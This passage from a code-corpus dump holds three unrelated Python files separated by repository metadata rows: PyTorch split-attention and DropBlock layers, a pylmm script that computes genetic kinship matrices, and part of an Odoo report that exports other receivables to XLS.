        self.dropblock_prob = dropblock_prob
        if self.rectify:
            # NOTE(review): rfconv is an optional external dependency; this
            # import only runs when rectify=True and padding is non-zero.
            from rfconv import RFConv2d
            self.conv = RFConv2d(in_channels, channels*radix, kernel_size, stride, padding, dilation,
                                 groups=groups*radix, bias=bias, average_mode=rectify_avg, **kwargs)
        else:
            self.conv = Conv2d(in_channels, channels*radix, kernel_size, stride, padding, dilation,
                               groups=groups*radix, bias=bias, **kwargs)
        self.use_bn = norm_layer is not None
        if self.use_bn:
            self.bn0 = norm_layer(channels*radix)
        self.relu = ReLU(inplace=True)
        self.fc1 = Conv2d(channels, inter_channels, 1, groups=self.cardinality)
        if self.use_bn:
            self.bn1 = norm_layer(inter_channels)
        self.fc2 = Conv2d(inter_channels, channels*radix, 1, groups=self.cardinality)
        if dropblock_prob > 0.0:
            self.dropblock = DropBlock2D(dropblock_prob, 3)
        self.rsoftmax = rSoftMax(radix, groups)
    def forward(self, x):
        x = self.conv(x)
        if self.use_bn:
            x = self.bn0(x)
        if self.dropblock_prob > 0.0:
            x = self.dropblock(x)
        x = self.relu(x)
        batch, rchannel = x.shape[:2]
        if self.radix > 1:
            # Sum over the radix splits before pooling ("squeeze" step).
            splited = torch.split(x, rchannel//self.radix, dim=1)
            gap = sum(splited)
        else:
            gap = x
        # Global average pool -> bottleneck FC -> per-split attention logits.
        gap = F.adaptive_avg_pool2d(gap, 1)
        gap = self.fc1(gap)
        if self.use_bn:
            gap = self.bn1(gap)
        gap = self.relu(gap)
        atten = self.fc2(gap)
        atten = self.rsoftmax(atten).view(batch, -1, 1, 1)
        if self.radix > 1:
            # Weighted sum of the splits by their attention maps.
            attens = torch.split(atten, rchannel//self.radix, dim=1)
            out = sum([att*split for (att, split) in zip(attens, splited)])
        else:
            out = atten * x
        return out.contiguous()
class rSoftMax(nn.Module):
    """Radix-wise softmax used by split attention.

    For radix > 1, reshapes the logits to (batch, cardinality, radix, -1),
    applies softmax across the radix axis, and flattens back. For radix <= 1
    it degenerates to an element-wise sigmoid.
    """

    def __init__(self, radix, cardinality):
        super().__init__()
        self.radix = radix
        self.cardinality = cardinality

    def forward(self, x):
        batch = x.size(0)
        if self.radix > 1:
            grouped = x.view(batch, self.cardinality, self.radix, -1)
            attn = F.softmax(grouped.transpose(1, 2), dim=1)
            return attn.reshape(batch, -1)
        return torch.sigmoid(x)
class DropBlock2D(nn.Module):
    """DropBlock regularization with a linear drop-probability schedule.

    The step counter ``i`` and ``drop_prob`` live in buffers so they follow
    the module across devices; ``reset_steps()`` arms a linear ramp of the
    drop probability between ``start_step`` and ``start_step + nr_steps``.
    Buffers are intentionally never saved (see ``_save_to_state_dict``).
    """
    def __init__(self, drop_prob, block_size, share_channel=False):
        super(DropBlock2D, self).__init__()
        self.register_buffer('i', torch.zeros(1, dtype=torch.int64))
        self.register_buffer('drop_prob', drop_prob * torch.ones(1, dtype=torch.float32))
        self.inited = False
        self.step_size = 0.0
        self.start_step = 0
        self.nr_steps = 0
        self.block_size = block_size
        # If True, one spatial mask is shared across all channels.
        self.share_channel = share_channel

    def reset(self):
        """stop DropBlock"""
        self.inited = True
        self.i[0] = 0
        self.drop_prob = 0.0

    def reset_steps(self, start_step, nr_steps, start_value=0, stop_value=None):
        """Arm a linear ramp of drop_prob from start_value to stop_value."""
        self.inited = True
        stop_value = self.drop_prob.item() if stop_value is None else stop_value
        self.i[0] = 0
        self.drop_prob[0] = start_value
        self.step_size = (stop_value - start_value) / nr_steps
        self.nr_steps = nr_steps
        self.start_step = start_step

    def forward(self, x):
        # Identity in eval mode or while the drop probability is zero.
        if not self.training or self.drop_prob.item() == 0.:
            return x
        else:
            self.step()
            # get gamma value
            gamma = self._compute_gamma(x)
            # sample mask and place on input device
            if self.share_channel:
                mask = (torch.rand(*x.shape[2:], device=x.device, dtype=x.dtype) < gamma).unsqueeze(0).unsqueeze(0)
            else:
                mask = (torch.rand(*x.shape[1:], device=x.device, dtype=x.dtype) < gamma).unsqueeze(0)
            # compute block mask
            block_mask, keeped = self._compute_block_mask(mask)
            # apply block mask
            out = x * block_mask
            # scale output so the expected activation magnitude is preserved
            out = out * (block_mask.numel() / keeped).to(out)
            return out

    def _compute_block_mask(self, mask):
        # Dilate each sampled center into a block_size x block_size zero patch.
        block_mask = F.max_pool2d(mask,
                                  kernel_size=(self.block_size, self.block_size),
                                  stride=(1, 1),
                                  padding=self.block_size // 2)
        keeped = block_mask.numel() - block_mask.sum().to(torch.float32)
        block_mask = 1 - block_mask
        return block_mask, keeped

    def _compute_gamma(self, x):
        # Bernoulli rate chosen so the expected dropped area matches drop_prob.
        _, c, h, w = x.size()
        gamma = self.drop_prob.item() / (self.block_size ** 2) * (h * w) / \
            ((w - self.block_size + 1) * (h - self.block_size + 1))
        return gamma

    def step(self):
        assert self.inited
        idx = self.i.item()
        if idx > self.start_step and idx < self.start_step + self.nr_steps:
            self.drop_prob += self.step_size
        self.i += 1

    def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
                              missing_keys, unexpected_keys, error_msgs):
        # Buffers are never saved, so inject defaults for any that are absent
        # before delegating to the standard loader.
        idx_key = prefix + 'i'
        drop_prob_key = prefix + 'drop_prob'
        if idx_key not in state_dict:
            state_dict[idx_key] = torch.zeros(1, dtype=torch.int64)
        if drop_prob_key not in state_dict:
            # BUG FIX: was `if idx_key not in drop_prob_key:` — a substring
            # test on the key *names* that overwrote any loaded drop_prob.
            state_dict[drop_prob_key] = torch.ones(1, dtype=torch.float32)
        super(DropBlock2D, self)._load_from_state_dict(
            state_dict, prefix, local_metadata, strict,
            missing_keys, unexpected_keys, error_msgs)

    def _save_to_state_dict(self, destination, prefix, keep_vars):
        """Intentionally skip saving buffers (schedule state is transient)."""
        pass

    def extra_repr(self):
        return 'drop_prob={}, step_size={}'.format(self.drop_prob, self.step_size)
def reset_dropblock(start_step, nr_steps, start_value, stop_value, m):
    # Helper intended for nn.Module.apply(): (re)arms the DropBlock ramp on
    # every DropBlock2D submodule, leaving other module types untouched.
    if isinstance(m, DropBlock2D):
        m.reset_steps(start_step, nr_steps, start_value, stop_value)
def get_activation_layer(activation, out_channels):
    """
    Create activation layer from a string name, a factory function, or an
    already-constructed module.

    Parameters
    ----------
    activation : str, callable or nn.Module
        One of "relu", "relu6", "sigmoid", "prelu"; or a zero-argument
        factory returning a module; or an nn.Module returned as-is.
    out_channels : int
        Channel count used to size the PReLU parameters.

    Returns
    -------
    nn.Module
    """
    assert (activation is not None)
    # The docstring always promised "string/function", but only strings were
    # handled — so ConvBlock's default `lambda: nn.ReLU(inplace=True)` raised
    # NotImplementedError. Accept zero-arg factories and modules as well.
    if isfunction(activation):
        return activation()
    if isinstance(activation, nn.Module):
        return activation
    if activation == "relu":
        return nn.ReLU(inplace=True)
    elif activation == "relu6":
        return nn.ReLU6(inplace=True)
    elif activation == "sigmoid":
        return nn.Sigmoid()
    elif activation == "prelu":
        return nn.PReLU(out_channels)
    else:
        raise NotImplementedError()
class ConvBlock(nn.Module):
    """
    Standard convolution block with Batch normalization and activation.
    """
    def __init__(self, in_channels, out_channels, kernel_size, stride, padding,
                 dilation=1, groups=1, bias=False, use_bn=True, bn_eps=1e-5,
                 activation=(lambda: nn.ReLU(inplace=True))):
        super(ConvBlock, self).__init__()
        self.activate = (activation is not None)
        self.use_bn = use_bn
        # A 4-element padding means asymmetric (left, right, top, bottom)
        # padding, which Conv2d cannot express directly — route it through
        # an explicit ZeroPad2d and zero out Conv2d's own padding.
        self.use_pad = (isinstance(padding, (list, tuple)) and (len(padding) == 4))
        if self.use_pad:
            self.pad = nn.ZeroPad2d(padding=padding)
            padding = 0
        self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,
                              stride=stride, padding=padding, dilation=dilation, groups=groups, bias=bias)
        if self.use_bn:
            self.bn = nn.BatchNorm2d(num_features=out_channels, eps=bn_eps)
        if self.activate:
            # NOTE(review): resolves to the two-argument get_activation_layer
            # defined above in this module (the one-argument version earlier
            # in the file is shadowed by it).
            self.activ = get_activation_layer(activation, out_channels)
    def forward(self, x):
        if self.use_pad:
            x = self.pad(x)
        x = self.conv(x)
        if self.use_bn:
            x = self.bn(x)
        if self.activate:
            x = self.activ(x)
        return x
def conv1x1_block(in_channels, out_channels, stride=1, padding=0, groups=1,
                  bias=False, use_bn=True, bn_eps=1e-5,
                  activation=(lambda: nn.ReLU(inplace=True))):
    # 1x1 (pointwise) ConvBlock with optional BN and activation.
    return ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=1, stride=stride,
                     padding=padding, groups=groups, bias=bias, use_bn=use_bn, bn_eps=bn_eps, activation=activation)
def conv3x3_block(in_channels, out_channels, stride=1, padding=1, dilation=1, groups=1,
                  bias=False, use_bn=True, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
    # 3x3 ConvBlock with optional BN and activation (default same-padding).
    return ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=stride,
                     padding=padding, dilation=dilation, groups=groups, bias=bias, use_bn=use_bn, bn_eps=bn_eps,
                     activation=activation)
def dwconv_block(in_channels, out_channels, kernel_size, stride=1, padding=1, dilation=1,
                 bias=False, use_bn=True, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
    # Depthwise ConvBlock: groups=out_channels makes each channel convolve
    # independently with its own kernel.
    return ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,
                     padding=padding, dilation=dilation, groups=out_channels, bias=bias, use_bn=use_bn, bn_eps=bn_eps, activation=activation)
def dwconv3x3_block(in_channels, out_channels, stride=1, padding=1, dilation=1,
                    bias=False, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
    # 3x3 depthwise ConvBlock (same-padding by default).
    return dwconv_block(in_channels=in_channels, out_channels=out_channels, kernel_size=3, stride=stride,
                        padding=padding, dilation=dilation, bias=bias, bn_eps=bn_eps, activation=activation)
def dwconv5x5_block(in_channels, out_channels, stride=1, padding=2, dilation=1,
                    bias=False, bn_eps=1e-5, activation=(lambda: nn.ReLU(inplace=True))):
    # 5x5 depthwise ConvBlock (same-padding by default).
    return dwconv_block( in_channels=in_channels, out_channels=out_channels, kernel_size=5, stride=stride,
                        padding=padding, dilation=dilation, bias=bias, bn_eps=bn_eps, activation=activation)
class SEBlock(nn.Module):
    # Squeeze-and-Excitation block; the bottleneck FCs can be 1x1 convs
    # (use_conv=True) or nn.Linear layers (use_conv=False).
    # NOTE(review): mid_activation/out_activation are accepted but never used —
    # the activations are hard-coded to ReLU and Sigmoid below.
    def __init__(self, channels, reduction=16, round_mid=False, use_conv=True,
                 mid_activation=(lambda: nn.ReLU(inplace=True)),
                 out_activation=(lambda: nn.Sigmoid())):
        super(SEBlock, self).__init__()
        self.use_conv = use_conv
        # NOTE(review): round_channels is not defined in this module; the
        # round_mid=True path would raise NameError — confirm where it lives.
        mid_channels = channels // reduction if not round_mid else round_channels(float(channels) / reduction)
        self.pool = nn.AdaptiveAvgPool2d(output_size=1)
        if use_conv:
            self.conv1 = nn.Conv2d(in_channels=channels, out_channels=mid_channels, kernel_size=1,
                                   stride=1, groups=1, bias=True)
        else:
            self.fc1 = nn.Linear(in_features=channels, out_features=mid_channels)
        self.activ = nn.ReLU(inplace=True)
        if use_conv:
            self.conv2 = nn.Conv2d(in_channels=mid_channels, out_channels=channels, kernel_size=1,
                                   stride=1, groups=1, bias=True)
        else:
            self.fc2 = nn.Linear(in_features=mid_channels, out_features=channels)
        self.sigmoid = nn.Sigmoid()
    def forward(self, x):
        w = self.pool(x)
        if not self.use_conv:
            # Linear layers need the pooled map flattened to (batch, channels).
            w = w.view(x.size(0), -1)
        w = self.conv1(w) if self.use_conv else self.fc1(w)
        w = self.activ(w)
        w = self.conv2(w) if self.use_conv else self.fc2(w)
        w = self.sigmoid(w)
        if not self.use_conv:
            # Restore (batch, channels, 1, 1) so the gate broadcasts over H, W.
            w = w.unsqueeze(2).unsqueeze(3)
        x = x * w
        return x
class SpatialGate(nn.Module):
    # Spatial attention gate (CBAM-style): concatenates the channel-wise max
    # and mean maps, runs a 7x7 conv, and multiplies the sigmoid mask into x.
    def __init__(self):
        super(SpatialGate, self).__init__()
        self.conv = ConvBlock(in_channels=2, out_channels=1, kernel_size=7,
                              stride=1, padding=3, bias=False, use_bn=True, activation=None)
        self.sigmoid = nn.Sigmoid()
    def forward(self, x):
        # (B, C, H, W) -> two (B, 1, H, W) descriptor maps.
        att1 = x.max(dim=1)[0].unsqueeze(1)
        att2 = x.mean(dim=1).unsqueeze(1)
        att = torch.cat((att1, att2), dim=1)
        att = self.conv(att)
        att = self.sigmoid(att)
        x = x * att
        return x
"[email protected]"
] | |
69c9e262048633d25a5a72be25d5d7d6e2d42520 | d29284979657a3c05e4f8093ef1c22faf24b7897 | /scripts/pylmmKinship.py | 6ced7f73a3b236da52df218545b2581278c50c0a | [] | no_license | ChristophRau/GxTheta | 77b44488f6195c96c782e391bfbbce68a71d69fb | 1effab7382ecd5cb934ea8609a89be2654f59622 | refs/heads/master | 2022-09-22T22:51:12.211080 | 2022-09-14T14:39:28 | 2022-09-14T14:39:28 | 162,505,442 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,194 | py | #!/usr/bin/python
# pylmm is a python-based linear mixed-model solver with applications to GWAS
# Copyright (C) 2013 Nicholas A. Furlotte ([email protected])
# The program is free for academic use. Please contact Nick Furlotte
# <[email protected]> if you are interested in using the software for
# commercial purposes.
# The software must not be modified and distributed without prior
# permission of the author.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import estimate_variance_components
from optparse import OptionParser, OptionGroup

# ---------------------------------------------------------------------------
# Command-line interface.
# NOTE: the original file imported sys and estimate_variance_components twice
# and imported pdb without using it; the duplicates/unused import were removed.
# Behavior is otherwise unchanged.
# ---------------------------------------------------------------------------
usage = """usage: %prog [options] --[tfile | bfile] plinkFileBase outfile (--GxE --covfile covfile [--phenofile phenoFile])
"""
parser = OptionParser(usage=usage)
basicGroup = OptionGroup(parser, "Basic Options")
GxEGroup = OptionGroup(parser, "GxE Options")
# basicGroup.add_option("--pfile", dest="pfile",
#                       help="The base for a PLINK ped file")
basicGroup.add_option("--tfile", dest="tfile",
                      help="The base for a PLINK tped file")
basicGroup.add_option("--bfile", dest="bfile",
                      help="The base for a PLINK binary ped file")
basicGroup.add_option("--SNPemma", dest="emmaFile", default=None,
                      help="For backwards compatibility with emma, we allow for \"EMMA\" file formats. "
                           "This is just a text file with individuals on the columns and snps on the rows.")
basicGroup.add_option("--NumSNPsemma", dest="numSNPs", type="int", default=0,
                      help="When providing the SNPemma file you need to specify how many snps are in the file")
basicGroup.add_option("-e", "--efile", dest="saveEig", help="Save eigendecomposition to this file.")
basicGroup.add_option("-n", default=1000, dest="computeSize", type="int",
                      help="The maximum number of SNPs to read into memory at once (default 1000). "
                           "This is important when there is a large number of SNPs, because memory could be an issue.")
basicGroup.add_option("-v", "--verbose",
                      action="store_true", dest="verbose", default=False,
                      help="Print extra info")
GxEGroup.add_option("--gxe", "--GxE",
                    action="store_true", dest="runGxE", default=False,
                    help="Run a gene-by-environment test instead of the gene test; "
                         "the environment variable should be binary and written as "
                         "the last column of the covariate file.")
GxEGroup.add_option("--covfile", dest="covfile", default=None,
                    help="The environment filename (no header)")
GxEGroup.add_option("--phenofile", dest="phenoFile", default=None,
                    help="Without this argument the program will look "
                         "for a file with .pheno that has the plinkFileBase root. "
                         "If you want to specify an alternative phenotype file, "
                         "then use this argument. This file should be in plink format. ")
parser.add_option_group(basicGroup)
parser.add_option_group(GxEGroup)
# advancedGroup was never populated in the original; omitted here as well.
(options, args) = parser.parse_args()
if len(args) != 1:
    # Exactly one positional argument (the output file) is required.
    parser.print_help()
    sys.exit()
outFile = args[0]

# Heavy imports are deferred until after argument parsing (as in the
# original) so '--help' does not pay the cost of loading the numeric stack.
# NOTE(review): 'os' and 'scipy.linalg' are imported but not referenced in
# this script — kept for backward compatibility; confirm before removing.
import os
import numpy as np
from scipy import linalg
from pylmmGxT import input, lmm

if not options.tfile and not options.bfile and not options.emmaFile:
    parser.error(
        "You must provide at least one PLINK input file base (--tfile or --bfile)"
        " or an emma formatted file (--emmaSNP).")
if options.verbose:
    sys.stderr.write("Reading PLINK input...\n")

# ---------------------------------------------------------------------------
# Open the genotype input.  In GxE mode the phenotype file is attached so the
# variance-component estimation below can read phenotypes from the same object.
# ---------------------------------------------------------------------------
if options.runGxE:
    if options.bfile:
        IN = input.plink(options.bfile, type='b', phenoFile=options.phenoFile)
    elif options.tfile:
        IN = input.plink(options.tfile, type='t', phenoFile=options.phenoFile)
    else:
        parser.error(
            "You must provide at least one PLINK input file base (--tfile or --bfile)"
            " or an emma formatted file (--emmaSNP).")
else:
    if options.bfile:
        IN = input.plink(options.bfile, type='b')
    elif options.tfile:
        IN = input.plink(options.tfile, type='t')
    # elif options.pfile: IN = input.plink(options.pfile,type='p')
    elif options.emmaFile:
        if not options.numSNPs:
            parser.error("You must provide the number of SNPs when specifying an emma formatted file.")
        IN = input.plink(options.emmaFile, type='emma')
    else:
        parser.error(
            "You must provide at least one PLINK input file base (--tfile or --bfile)"
            " or an emma formatted file (--emmaSNP).")

# Genetic kinship matrix, computed incrementally to bound memory usage.
K_G = lmm.calculateKinshipIncremental(IN, numSNPs=options.numSNPs,
                                      computeSize=options.computeSize, center=False, missing="MAF")
# In GxE mode the genetic kinship gets a suffixed name because a second,
# combined kinship file will also be written below.
if options.runGxE:
    K_G_outfile = '{}_K_G.pylmm.kin'.format(outFile)
else:
    K_G_outfile = outFile
if options.verbose:
    sys.stderr.write("Saving Genetic Kinship file to %s\n" % K_G_outfile)
np.savetxt(K_G_outfile, K_G)

if options.saveEig:
    # Optionally precompute and store the eigendecomposition of K_G so later
    # association runs can skip this expensive step.
    if options.verbose:
        sys.stderr.write("Obtaining Eigendecomposition of K_G\n")
    K_Gva, K_Gve = lmm.calculateEigendecomposition(K_G)
    if options.verbose:
        sys.stderr.write("Saving eigendecomposition to %s.[kva | kve]\n" % K_G_outfile)
    np.savetxt("{}.kva".format(K_G_outfile), K_Gva)
    np.savetxt("{}.kve".format(K_G_outfile), K_Gve)

if options.runGxE:
    # ---------------------------------------------------------------
    # Gene-by-environment mode: combine the genetic kinship with the
    # environment covariate into a joint kinship plus variance components.
    # ---------------------------------------------------------------
    if options.verbose:
        sys.stderr.write("Reading covariate file...\n")
    # Only the first column of the covariate/phenotype matrices is used.
    X0 = IN.getCovariates(options.covfile)
    X0 = np.array([u[0] for u in X0])
    Y = IN.getPhenos(options.phenoFile)
    Y = np.array([u[0] for u in Y])
    print (X0)
    print ('---------')
    print (Y)
    components_dict, K_combined = estimate_variance_components.main(Y=Y, K_G=K_G, env=X0)
    K_combined_outfile = '{}_K_combined.pylmm.kin'.format(outFile)
    if options.verbose:
        sys.stderr.write("Saving GxE & Genetic Combined Kinship file to %s\n" % K_combined_outfile)
    np.savetxt(K_combined_outfile, K_combined)
    # Write the variance components and their shares of total variance V_p.
    K_combined_varcomp_outfile = '{}_K_combined_varcomps.txt'.format(outFile)
    with open(K_combined_varcomp_outfile, 'w') as f:
        val_sum = sum(components_dict.values())
        outputs, output_divs = [], []
        for k in sorted(components_dict.keys()):
            outputs.append('{}\t{}'.format(k, components_dict[k]))
            output_divs.append('{}\t{:.3}%'.format('{}/V_p'.format(k), 100*components_dict[k]/val_sum))
        outputs = ['V_p\t{}'.format(val_sum)] + outputs
        output_str = '\n'.join(outputs + output_divs)
        f.write(output_str)
    if options.saveEig:
        if options.verbose:
            sys.stderr.write("Obtaining Eigendecomposition of K_combined\n")
        K_combined_va, K_combined_ve = lmm.calculateEigendecomposition(K_combined)
        if options.verbose:
            sys.stderr.write("Saving eigendecomposition to %s.[kva | kve]\n" % K_combined_outfile)
        np.savetxt("{}.kva".format(K_combined_outfile), K_combined_va)
        np.savetxt("{}.kve".format(K_combined_outfile), K_combined_ve)
| [
"[email protected]"
] | |
237f1bd2dc487fe60a3de9660c545f74da8c252b | c4702d1a06640555829b367852138cc93ba4a161 | /dym_report_other_receivable/report/dym_report_xls.py | e815ff128933ca57add0dc5c6cc764a60b2f11eb | [] | no_license | Rizalimami/dym | 0ecadf9c049b22ebfebf92e4eab6eaad17dd3e26 | af1bcf7b77a3212bc8a8a0e41e6042a134587ed4 | refs/heads/master | 2020-04-08T10:56:43.605698 | 2018-11-27T06:44:08 | 2018-11-27T06:44:08 | 159,287,876 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 17,005 | py | import xlwt
from datetime import datetime
from openerp.osv import orm
from openerp.addons.report_xls.report_xls import report_xls
from openerp.addons.report_xls.utils import rowcol_to_cell, _render
from .dym_report import dym_report_other_receivable_print
from openerp.tools.translate import translate
import logging
_logger = logging.getLogger(__name__)
import string
# Translation domain passed to translate() by the report parser's `_` helper.
_ir_translation_name = 'report.other.receivable'
class dym_report_other_receivable_print_xls(dym_report_other_receivable_print):
    """Parser for the 'Other Receivable' XLS report.

    Extends the base report parser and injects into the rendering context the
    wanted-column lists and template overrides taken from the
    'account.voucher' model, plus a translation helper `_`.
    """
    def __init__(self, cr, uid, name, context):
        super(dym_report_other_receivable_print_xls, self).__init__(
            cr, uid, name, context=context)
        # Column definitions and template tweaks live on account.voucher.
        move_line_obj = self.pool.get('account.voucher')
        self.context = context
        # Columns to render on the overview sheet.
        wl_overview = move_line_obj._report_xls_other_receivable_fields(
            cr, uid, context)
        tmpl_upd_overview = move_line_obj._report_xls_arap_overview_template(
            cr, uid, context)
        # NOTE(review): the details template reuses the *overview* template
        # method (_report_xls_arap_overview_template) — looks deliberate, but
        # confirm a dedicated details template was not intended here.
        wl_details = move_line_obj._report_xls_arap_details_fields(
            cr, uid, context)
        tmpl_upd_details = move_line_obj._report_xls_arap_overview_template(
            cr, uid, context)
        self.localcontext.update({
            'datetime': datetime,
            'wanted_list_overview': wl_overview,
            'template_update_overview': tmpl_upd_overview,
            'wanted_list_details': wl_details,
            'template_update_details': tmpl_upd_details,
            '_': self._,
        })
    def _(self, src):
        """Translate `src` in the report translation domain for the context
        language; fall back to the untranslated string."""
        lang = self.context.get('lang', 'en_US')
        return translate(
            self.cr, _ir_translation_name, 'report', lang, src) or src
class report_other_receivable_xls(report_xls):
    """XLS renderer for the 'Other Receivable' report.

    __init__ prepares xlwt cell styles and the per-column rendering templates;
    generate_xls_report() then writes one worksheet per report dict produced
    by the parser above.
    """
    def __init__(self, name, table, rml=False,
                 parser=False, header=True, store=False):
        super(report_other_receivable_xls, self).__init__(
            name, table, rml, parser, header, store)
        # Cell Styles
        _xs = self.xls_styles
        # header
        # Report Column Headers format
        rh_cell_format = _xs['bold'] + _xs['fill'] + _xs['borders_all']
        self.rh_cell_style = xlwt.easyxf(rh_cell_format)
        self.rh_cell_style_center = xlwt.easyxf(
            rh_cell_format + _xs['center'])
        self.rh_cell_style_right = xlwt.easyxf(rh_cell_format + _xs['right'])
        # Partner Column Headers format
        # NOTE(review): fill_blue is defined but never referenced below —
        # confirm it is dead before removing.
        fill_blue = 'pattern: pattern solid, fore_color 27;'
        ph_cell_format = _xs['bold'] + _xs['fill'] + _xs['borders_all']
        self.ph_cell_style = xlwt.easyxf(ph_cell_format)
        self.ph_cell_style_decimal = xlwt.easyxf(
            ph_cell_format + _xs['right'],
            num_format_str=report_xls.decimal_format)
        # Partner Column Data format
        pd_cell_format = _xs['borders_all']
        self.pd_cell_style = xlwt.easyxf(pd_cell_format)
        self.pd_cell_style_center = xlwt.easyxf(
            pd_cell_format + _xs['center'])
        self.pd_cell_style_date = xlwt.easyxf(
            pd_cell_format + _xs['left'],
            num_format_str=report_xls.date_format)
        self.pd_cell_style_decimal = xlwt.easyxf(
            pd_cell_format + _xs['right'],
            num_format_str=report_xls.decimal_format)
        # totals
        rt_cell_format = _xs['bold'] + _xs['fill'] + _xs['borders_all']
        self.rt_cell_style = xlwt.easyxf(rt_cell_format)
        self.rt_cell_style_right = xlwt.easyxf(rt_cell_format + _xs['right'])
        self.rt_cell_style_decimal = xlwt.easyxf(
            rt_cell_format + _xs['right'],
            num_format_str=report_xls.decimal_format)
        # XLS Template
        # Each entry maps a column key to three row specs:
        #   'header' -> column title row, 'lines' -> one data row per record,
        #   'totals' -> the summary row.  Spec layout follows report_xls:
        #   [colspan, width, cell type, value (possibly lazy via _render),
        #    optional extras, optional style].
        self.col_specs_template_overview = {
            'no': {
                'header': [1, 5, 'text', _render("_('No')")],
                'lines': [1, 0, 'number', _render("p['no']")],
                'totals': [1, 5, 'text', None]},
            'branch_status': {
                'header': [1, 10, 'text', _render("_('Branch Status')"),None,self.rh_cell_style_center],
                'lines': [1, 0, 'text', _render("p['branch_status'] or 'n/a'")],
                'totals': [1, 0, 'text', None]},
            'branch_id': {
                'header': [1, 22, 'text', _render("_('Cabang')")],
                'lines': [1, 0, 'text', _render("p['branch_id']")],
                'totals': [1, 22, 'text', _render("_('Total')")]},
            'number': {
                'header': [1, 22, 'text', _render("_('Number')")],
                'lines': [1, 0, 'text', _render("p['number']")],
                'totals': [1, 22, 'text', None]},
            'division': {
                'header': [1, 22, 'text', _render("_('Divisi')")],
                'lines': [1, 0, 'text', _render("p['division']")],
                'totals': [1, 22, 'text', None]},
            'partner_code': {
                'header': [1, 22, 'text', _render("_('Customer')")],
                'lines': [1, 0, 'text', _render("p['partner_code']")],
                'totals': [1, 22, 'text', None]},
            'partner_name': {
                'header': [1, 22, 'text', _render("_('Nama Customer')")],
                'lines': [1, 0, 'text', _render("p['partner_name']")],
                'totals': [1, 22, 'text', None]},
            'journal_name': {
                'header': [1, 22, 'text', _render("_('Journal')")],
                'lines': [1, 0, 'text', _render("p['journal_name']")],
                'totals': [1, 22, 'text', None]},
            'account_code': {
                'header': [1, 22, 'text', _render("_('No COA')")],
                'lines': [1, 0, 'text', _render("p['account_code']")],
                'totals': [1, 22, 'text', None]},
            'account_name': {
                'header': [1, 22, 'text', _render("_('Nama COA')")],
                'lines': [1, 0, 'text', _render("p['account_name']")],
                'totals': [1, 22, 'text', None]},
            'analytic_combination': {
                'header': [1, 20, 'text', _render("_('Analytic Combination')"),None,self.rh_cell_style_center],
                'lines': [1, 0, 'text', _render("p['analytic_combination'] or ''")],
                'totals': [1, 0, 'text', None]},
            'analytic_1': {
                'header': [1, 20, 'text', _render("_('Analytic Company')"),None,self.rh_cell_style_center],
                'lines': [1, 0, 'text', _render("p['analytic_1'] or ''")],
                'totals': [1, 0, 'text', None]},
            'analytic_2': {
                'header': [1, 20, 'text', _render("_('Analytic Bisnis Unit')"),None,self.rh_cell_style_center],
                'lines': [1, 0, 'text', _render("p['analytic_2'] or ''")],
                'totals': [1, 0, 'text', None]},
            'analytic_3': {
                'header': [1, 20, 'text', _render("_('Analytic Branch')"),None,self.rh_cell_style_center],
                'lines': [1, 0, 'text', _render("p['analytic_3'] or ''")],
                'totals': [1, 0, 'text', None]},
            'analytic_4': {
                'header': [1, 20, 'text', _render("_('Analytic Cost Center')"),None,self.rh_cell_style_center],
                'lines': [1, 0, 'text', _render("p['analytic_4'] or ''")],
                'totals': [1, 0, 'text', None]},
            'memo': {
                'header': [1, 22, 'text', _render("_('Memo')")],
                'lines': [1, 0, 'text', _render("p['memo']")],
                'totals': [1, 0, 'text', None]},
            'ref': {
                'header': [1, 22, 'text', _render("_('Ref')")],
                'lines': [1, 0, 'text', _render("p['ref']")],
                'totals': [1, 22, 'text', None]},
            'date': {
                'header': [1, 22, 'text', _render("_('Tanggal')")],
                'lines': [1, 0, 'text', _render("p['date']")],
                'totals': [1, 22, 'text', None]},
            'date_due': {
                'header': [1, 22, 'text', _render("_('Tgl Jatuh Tempo')")],
                'lines': [1, 0, 'text', _render("p['date_due']")],
                'totals': [1, 22, 'text', None]},
            'state': {
                'header': [1, 22, 'text', _render("_('Status')")],
                'lines': [1, 0, 'text', _render("p['state']")],
                'totals': [1, 22, 'text', None]},
            'total': {
                'header': [1, 22, 'text', _render("_('Total')")],
                'lines': [1, 0, 'number', _render("p['total']"), None, self.pd_cell_style_decimal],
                'totals': [1, 22, 'number', _render("p['total']"), None, self.rt_cell_style_decimal]},
            'dpp': {
                'header': [1, 22, 'text', _render("_('DPP')")],
                'lines': [1, 0, 'number', _render("p['dpp']"), None, self.pd_cell_style_decimal],
                'totals': [1, 22, 'number', _render("p['dpp']"), None, self.rt_cell_style_decimal]},
            'ppn': {
                'header': [1, 22, 'text', _render("_('PPn')")],
                'lines': [1, 0, 'number', _render("p['ppn']"), None, self.pd_cell_style_decimal],
                'totals': [1, 22, 'number', _render("p['ppn']"), None, self.rt_cell_style_decimal]},
            'pph': {
